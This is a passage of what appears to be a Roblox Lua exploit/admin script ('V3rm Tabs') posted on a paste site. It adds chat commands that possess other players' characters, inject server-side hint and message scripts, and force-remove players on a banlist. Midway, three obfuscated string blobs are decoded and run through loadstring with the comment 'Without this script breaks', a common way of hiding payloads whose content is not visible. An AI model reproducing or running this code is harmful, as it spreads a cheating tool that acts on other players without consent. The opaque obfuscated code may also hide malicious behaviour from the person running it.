  1765. if v ~= LocalPlayer then
  1766. table.insert(plrs, v)
  1767. end
  1768. end
  1769. else
  1770. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1771. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1772. table.insert(plrs, v)
  1773. end
  1774. end
  1775. end
  1776. return plrs
  1777. end
  1778.  
  1779. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1780. end
  1781.  
  1782. LocalPlayer.Chatted:connect(function(m)
  1783. for i,v in pairs(Cmds) do
  1784. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1785. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1786. end
  1787. end
  1788. end)
  1789.  
  1790.  
  1791.  
  1792. AddCmd("Possess","ps","Possess a player",
  1793. function(Plrs)
  1794. for _, plr in pairs(Plrs) do
  1795. if plr and plr.Character then
  1796. LocalPlayer.Character = plr.Character
  1797. workspace.CurrentCamera.CameraType = "Custom"
  1798. workspace.CurrentCamera.CameraSubject = plr.Character.Humanoid
  1799. end
  1800. end
  1801. end
  1802. )
  1803.  
  1804. AddCmd("Hint","hh","Show some hint",
  1805. function(nothing, msg)
  1806. if found then
  1807. NewS([[
  1808. a = Instance.new("Hint", workspace)
  1809. msg = "]]..msg..[["
  1810. msg = msg:gsub("","\5")
  1811. game:service'Debris':AddItem(a, 5)
  1812. while wait() do
  1813. for i = 30,0,-1 do
  1814. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1815. wait()
  1816. end
  1817. for i = 0,30,1 do
  1818. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1819. wait()
  1820. end
  1821. end
  1822. ]], workspace)
  1823. end
  1824. end
  1825. )
  1826. AddCmd("Message","msg","Show a message",
  1827. function(nothing, msg)
  1828. if found then
  1829. NewS([[
  1830. a = Instance.new("Message", workspace)
  1831. msg = "]]..msg..[["
  1832. msg = msg:gsub("","\5")
  1833. game:service'Debris':AddItem(a, 5)
  1834. while wait() do
  1835. for i = 30,0,-1 do
  1836. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1837. wait()
  1838. end
  1839. for i = 0,30,1 do
  1840. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  1841. wait()
  1842. end
  1843. end
  1844. ]], workspace)
  1845. end
  1846. end
  1847. )
  1848.  
  1849. for i = 0,8,1 do
  1850. wait(0.01)
  1851. end
  1852. --Without this script breaks--
  1853. local z={["#"]=0,["!"]=1,["^"]=2,["&"]=3,[")"]=4,["("]=5,["_"]=6,["+"]=7,["$"]=8,["-"]=9,["*"]=10,["="]=11,["@"]=12,["%"]=13,["?"]=14,["~"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1854. "~)(+)+#+(+)+$A^#(@_(_!_&+(_#^)_~_#^?_~_)+#^!_^_(+&+(_#^)+$_-_&+#^&+&_^+-_#+)+@^#A^?^?^@)~_&_!_@_#(@_!_-+(_^+?^?)!_%_(_@^#^~(~(-^*#~)(+)+#+(+)+$A^&)^+(_!_)+(_)_#^^_-+#^_(&&^+%_-_@_@_-_#&?_@^#^~_#+)+-_#+@_(_$+!&^A&#^!_?_)_#^!_@_(_=_&+!_!&^&)A&^&^^@^#^~(~(-^*#~)(+)+#+(+)+$A^+((_@_&_~_%_(_#^)+~_#^_(&&^+%_#^)+!_^_&+#^+)(_?_(_^+!_)+-_~_?_#^&&@^#A^?^?^@)~_&_!_@_#(@_!_-+(_^+?^?)!_%_(_@^#^~(~(-^*#~)(+)+#+(+)+$A^?)~_)+#^_)-_?_-_&+$_(_)_^^@^#^~(~(-^*#~)(+)+#+(+)+$^^^&)^+(_)_-_)+#^)+~_#^&(&_^+-_#+)+^)(+-_@_)_(_^+)((_&+)+-_?_+_^^@^#^~(~(-^*#__~_^+#^~(@^_+#^-_?_#^#+!_-_^+&+$^+_!_%_(_?^#(@_!_-+(_^+&+*&+)(_)+#(@_!_-+(_^+&+$^-^-^#^)_~_*#-___#^_+?^?)!_%_(_#^%&%&#^^^_(&&^+%_-_@_@_-_#&?_^^#^~_^+#^_+?^?)!_%_(_#^%&%&#^^^-_-_@)(+!_&(&_^+-_#+)+^^#^)+$_(_?_*#~)(+)+#+(+)+$^^^&)^+(_!_)+~_^+#^~___#^_()+!_^_&+#^-_&+#^-_?_%^+_!_%_(_^^-^*#(_?_)_*#(_?_)_"
  1855. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1856.  
  1857. local z={["("]=0,["#"]=1,["-"]=2,["?"]=3,["~"]=4,["&"]=5,["%"]=6,["_"]=7,["@"]=8,["*"]=9,["^"]=10,["="]=11,["+"]=12,[")"]=13,["!"]=14,["$"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1858. "_%#%)%&%!-(&+%#%*_&%-_?_!-(&+%#%*_&%-_#~~%~%&%~%^??%$%!%!%&%?%~_@-%%&_!%?%~_*%$%!%@-(_+%-_*-^(*A%(-(_+%-_!-!~#%)%&%(-)?)?(A-%&??-_)%*%+%+%*%(?!%--(-$%-_(-(_+%-_!-!~#%)%&%(-)?)?(---*%*%+~&_#%?&?%-_*%(_~_--(-~_@%&%!%^($~&_~_(_&_~_@---?~-_&%#%~_$%-_(-$%%%(-%&~_#%-%?_(-*%?_(-*%!%)-_%#%)%&%--*-^(&%!%~%^(&%!%~%*-"
  1859. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1860.  
  1861. local z={["!"]=0,[")"]=1,["$"]=2,["("]=3,["*"]=4,["="]=5,["_"]=6,["#"]=7,["~"]=8,["-"]=9,["&"]=10,["^"]=11,["@"]=12,["%"]=13,["?"]=14,["+"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1862. ")**_*_(*%_*_~A$-*?A_+_$$@A$-_?A_+_$$@A$-_?A_+_!$!A#?_(#!$^_$$@$&!__=#?_(_*#-_+_?_~$-$&!**-_(#%_-_(#(#~$-$&!__+_$#!$-_!$%(!$)(@$$(!$*_+_&!##)_-_*#~$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!+*=#*#!#=#*#~$#$(*$#=_)_*#=_*_!$$_-#!$_=(($#%_-_@_@_-_!(?_#$-$&!=_?_*_&!=_?_*_&!-$"
  1863. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1864.  
  1865.  
  1866.  
  1867. V3rmModeldebounce = false
  1868. modeldebounce = false
  1869. game:service'RunService'.Stepped:connect(function()
  1870. if modeldebounce then return end
  1871. rot = (rot % 360) + 0.0001
  1872. if V3rmModel.Parent ~= workspace then
  1873. modeldebounce = true
  1874. tabs = {}
  1875. V3rmModel = Instance.new("Model", workspace)
  1876. V3rmModel.Name = "V3rm Tabs"
  1877. tabs = {}
  1878. wait()
  1879. modeldebounce = false
  1880. end
  1881. end)
  1882.  
  1883. rot = 0
  1884. coroutine.resume(coroutine.create(function()
  1885. game:GetService("RunService").Stepped:connect(function()
  1886. if probemode == false then
  1887. if LocalPlayer.Character then
  1888. if LocalPlayer.Character:findFirstChild("Torso") then
  1889. rot = rot + 0.0001
  1890. for i,v in pairs(Tabs) do
  1891. ypcall(function()
  1892. local pos = LocalPlayer.Character.Torso.CFrame
  1893. local radius = 4 + (#Tabs * 0.5)
  1894. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1895. local y = 0
  1896. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1897. local arot = Vector3.new(x, y, z) + pos.p
  1898. local brot = v.CFrame.p
  1899. local crot = (arot * .1 + brot * .9)
  1900. v.CFrame = CFrame.new(crot, pos.p)
  1901. end)
  1902. end
  1903. end
  1904. end
  1905. end
  1906. if probemode == true then
  1907. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1908. rot = rot + 0.001
  1909. for i,v in pairs(Tabs) do
  1910. ypcall(function()
  1911. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1912. local radius = 4 + (#Tabs * 0.5)
  1913. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1914. local y = 0
  1915. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1916. local arot = Vector3.new(x, y, z) + pos.p
  1917. local brot = v.CFrame.p
  1918. local crot = (arot * .1 + brot * .9)
  1919. v.CFrame = CFrame.new(crot, pos.p)
  1920. end)
  1921. end
  1922. end
  1923. end
  1924. end)
  1925. end))
  1926. game:GetService("RunService").RenderStepped:connect(function()
  1927. for _,a in pairs(game:service('Players'):children()) do
  1928. for _,b in pairs(Banlist) do
  1929. if b:find(a.Name) then
  1930. NewLS([==[
  1931. Instance.new('Message',Workspace).Text = "You are Banned."
  1932. local p = game:GetService("Players").LocalPlayer
  1933. p.Parent=nil
  1934. wait()
  1935. p.Parent=game:GetService("Players")
  1936. ]==], a.Backpack)
  1937. a:remove()
  1938. Output('Banned Player # '..a.Name..' # Attempted to join.',__)
  1939. else
  1940. end
  1941. end
  1942. end
  1943. end)
  1944. game.Players.ChildRemoved:connect(function(plr)
  1945. Output("Disconnected: "..plr.Name)
  1946. wait(3)
  1947. Dismiss()
  1948. end)
  1949.  
  1950. game.Players.ChildAdded:connect(function(plr)
  1951. Output("Connected: "..plr.Name)
  1952. wait(3)
  1953. Dismiss()
  1954. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement